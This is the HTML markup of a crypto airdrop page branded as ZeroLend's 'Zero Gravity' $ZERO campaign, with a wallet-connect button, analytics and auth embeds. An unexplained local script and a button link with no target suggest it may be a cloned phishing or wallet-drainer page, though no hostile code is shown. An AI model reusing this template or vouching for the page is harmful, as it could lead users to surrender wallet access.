<!DOCTYPE html>
<html lang="en" data-theme="light"
    style="color-scheme: light; --wcm-color-fg-1: rgb(20,20,20); --wcm-color-fg-2: rgb(121,134,134); --wcm-color-fg-3: rgb(158,169,169); --wcm-color-bg-1: rgb(255,255,255); --wcm-color-bg-2: rgb(241,243,243); --wcm-color-bg-3: rgb(228,231,231); --wcm-color-overlay: rgba(0,0,0,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <meta name="description"
        content="Zero Gravity is an airdrop points platform to incentivize and distribute the $ZERO airdrop to the community">
    <link rel="icon" href="/favicon.ico">
    <link rel="apple-touch-icon" href="/logo192.png">
    <link rel="manifest" href="/manifest.json">
    <script charset="UTF-8" async type="text/javascript" src="js/9c41111f9a1.f.js"></script>
    <meta property="og:title" content="ZeroLend Gravity Airdrop">
    <meta property="og:site_name" content="ZeroLend Gravity Airdrop">
    <meta property="og:image" content="https://i.imgur.com/KaP3sNh.png">
    <meta property="og:url" content="https://airdrop.zerolend.xyz/">
    <meta property="og:description"
        content="Zero Gravity is an airdrop points platform to incentivize and distribute the $ZERO airdrop to the community">
    <meta property="og:type" content="website">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <title>ZeroLend Airdrop - Farm $ZERO</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link
        href="https://fonts.googleapis.com/css2?family=Manrope:wght@400;600;700&amp;family=Plus+Jakarta+Sans:wght@300;400;600;700&amp;display=swap"
        rel="stylesheet">
    <script defer="defer" src="/static/js/main.80203b8b.js"></script>
    <link href="/static/css/main.d51f40c1.css" rel="stylesheet">
    <style data-emotion="css-global" data-s=""></style>
    <style data-emotion="css-global" data-s=""></style>
    <style data-emotion="css-global" data-s=""></style>
    <style data-emotion="css" data-s=""></style>
</head>

<body class="chakra-ui-light">
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-1369LL9JKM"></script>
    <script>function gtag() { dataLayer.push(arguments) } window.dataLayer = window.dataLayer || [], gtag("js", new Date), gtag("config", "G-1369LL9JKM")</script>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
        <div data-rk="">
            <style>
                [data-rk] {
                    --rk-blurs-modalOverlay: blur(0px);
                    --rk-fonts-body: SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
                    --rk-radii-actionButton: 9999px;
                    --rk-radii-connectButton: 24px;
                    --rk-radii-menuButton: 12px;
                    --rk-radii-modal: 24px;
                    --rk-radii-modalMobile: 28px;
                    --rk-colors-accentColor: #fff;
                    --rk-colors-accentColorForeground: #000;
                    --rk-colors-actionButtonBorder: rgba(255, 255, 255, 0.04);
                    --rk-colors-actionButtonBorderMobile: rgba(255, 255, 255, 0.08);
                    --rk-colors-actionButtonSecondaryBackground: rgba(255, 255, 255, 0.08);
                    --rk-colors-closeButton: rgba(224, 232, 255, 0.6);
                    --rk-colors-closeButtonBackground: rgba(255, 255, 255, 0.08);
                    --rk-colors-connectButtonBackground: #1A1B1F;
                    --rk-colors-connectButtonBackgroundError: #FF494A;
                    --rk-colors-connectButtonInnerBackground: linear-gradient(0deg, rgba(255, 255, 255, 0.075), rgba(255, 255, 255, 0.15));
                    --rk-colors-connectButtonText: #FFF;
                    --rk-colors-connectButtonTextError: #FFF;
                    --rk-colors-connectionIndicator: #30E000;
                    --rk-colors-downloadBottomCardBackground: linear-gradient(126deg, rgba(0, 0, 0, 0) 9.49%, rgba(120, 120, 120, 0.2) 71.04%), #1A1B1F;
                    --rk-colors-downloadTopCardBackground: linear-gradient(126deg, rgba(120, 120, 120, 0.2) 9.49%, rgba(0, 0, 0, 0) 71.04%), #1A1B1F;
                    --rk-colors-error: #FF494A;
                    --rk-colors-generalBorder: rgba(255, 255, 255, 0.08);
                    --rk-colors-generalBorderDim: rgba(255, 255, 255, 0.04);
                    --rk-colors-menuItemBackground: rgba(224, 232, 255, 0.1);
                    --rk-colors-modalBackdrop: rgba(0, 0, 0, 0.5);
                    --rk-colors-modalBackground: #1A1B1F;
                    --rk-colors-modalBorder: rgba(255, 255, 255, 0.08);
                    --rk-colors-modalText: #FFF;
                    --rk-colors-modalTextDim: rgba(224, 232, 255, 0.3);
                    --rk-colors-modalTextSecondary: rgba(255, 255, 255, 0.6);
                    --rk-colors-profileAction: rgba(224, 232, 255, 0.1);
                    --rk-colors-profileActionHover: rgba(224, 232, 255, 0.2);
                    --rk-colors-profileForeground: rgba(224, 232, 255, 0.05);
                    --rk-colors-selectedOptionBorder: rgba(224, 232, 255, 0.1);
                    --rk-colors-standby: #FFD641;
                    --rk-shadows-connectButton: 0px 4px 12px rgba(0, 0, 0, 0.1);
                    --rk-shadows-dialog: 0px 8px 32px rgba(0, 0, 0, 0.32);
                    --rk-shadows-profileDetailsAction: 0px 2px 6px rgba(37, 41, 46, 0.04);
                    --rk-shadows-selectedOption: 0px 2px 6px rgba(0, 0, 0, 0.24);
                    --rk-shadows-selectedWallet: 0px 2px 6px rgba(0, 0, 0, 0.24);
                    --rk-shadows-walletLogo: 0px 2px 16px rgba(0, 0, 0, 0.16);
                }
            </style>
            <div class="bg-image css-4uy5nn">
                <div class="css-1jvrim6">
                    <div class="css-q74rec">
                        <div class="css-mberd3">
                            <div class="css-4hq83g"><a target="_blank" class="chakra-link css-spn4bz"
                                    href="https://zerolend.xyz"><img alt="Zerolend-logo"
                                        src="/static/media/zero-logo.a94ee879d1c589ba27f50a4da6027724.svg"
                                        class="chakra-image css-b7guvj"></a>
                                <p class="chakra-text black-gradient-text css-fc0zs2"><span
                                        class="theme-gradient-text">Voyage 1</span> <br>ZERO TO ZILLION</p>
                                <p class="chakra-text css-mlul41">Participate in Zero Gravity’s first pre-token campaign
                                    allocating 5% of the $ZERO supply</p><a class="chakra-link css-spn4bz"
                                    ><button type="button"
                                        class="chakra-button css-1eua4a2 connectButton">Enter Zero Gravity&nbsp;<svg
                                            stroke="currentColor" fill="currentColor" stroke-width="0"
                                            viewBox="0 0 512 512" height="1em" width="1em"
                                            xmlns="http://www.w3.org/2000/svg">
                                            <path
                                                d="M502.6 278.6c12.5-12.5 12.5-32.8 0-45.3l-128-128c-12.5-12.5-32.8-12.5-45.3 0s-12.5 32.8 0 45.3L402.7 224 32 224c-17.7 0-32 14.3-32 32s14.3 32 32 32l370.7 0-73.4 73.4c-12.5 12.5-12.5 32.8 0 45.3s32.8 12.5 45.3 0l128-128z">
                                            </path>
                                        </svg></button></a>
                            </div>
                        </div>
                        <div class="css-1kxonj9"><img src="/static/media/zero-sm.6ed7fe8fa3881a8253f5.png"
                                class="chakra-image css-1dqoog0"></div>
                    </div>
                </div>
            </div><span id="__chakra_env" hidden=""></span>
        </div>
    </div>
    <div class="chakra-portal">
        <div role="region" aria-live="polite" aria-label="Notifications-top" id="chakra-toast-manager-top"
            style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; margin: 0px auto; top: env(safe-area-inset-top, 0px); right: env(safe-area-inset-right, 0px); left: env(safe-area-inset-left, 0px);">
        </div>
        <div role="region" aria-live="polite" aria-label="Notifications-top-left" id="chakra-toast-manager-top-left"
            style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; top: env(safe-area-inset-top, 0px); left: env(safe-area-inset-left, 0px);">
        </div>
        <div role="region" aria-live="polite" aria-label="Notifications-top-right" id="chakra-toast-manager-top-right"
            style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; top: env(safe-area-inset-top, 0px); right: env(safe-area-inset-right, 0px);">
        </div>
        <div role="region" aria-live="polite" aria-label="Notifications-bottom-left"
            id="chakra-toast-manager-bottom-left"
            style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; bottom: env(safe-area-inset-bottom, 0px); left: env(safe-area-inset-left, 0px);">
        </div>
        <div role="region" aria-live="polite" aria-label="Notifications-bottom" id="chakra-toast-manager-bottom"
            style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; margin: 0px auto; bottom: env(safe-area-inset-bottom, 0px); right: env(safe-area-inset-right, 0px); left: env(safe-area-inset-left, 0px);">
        </div>
        <div role="region" aria-live="polite" aria-label="Notifications-bottom-right"
            id="chakra-toast-manager-bottom-right"
            style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; bottom: env(safe-area-inset-bottom, 0px); right: env(safe-area-inset-right, 0px);">
        </div>
    </div><iframe id="verify-api" src="https://verify.walletconnect.com/cfc12c6c49d329681212a698c47c01ef"
        style="display: none;"></iframe><wcm-modal></wcm-modal>
    <script src="https://auth.particle.network/preload.js?_=1714328280000" data-target="web-auth"></script><iframe
        src="https://auth.particle.network?preload=true" style="display: none;"></iframe>
</body>

</html>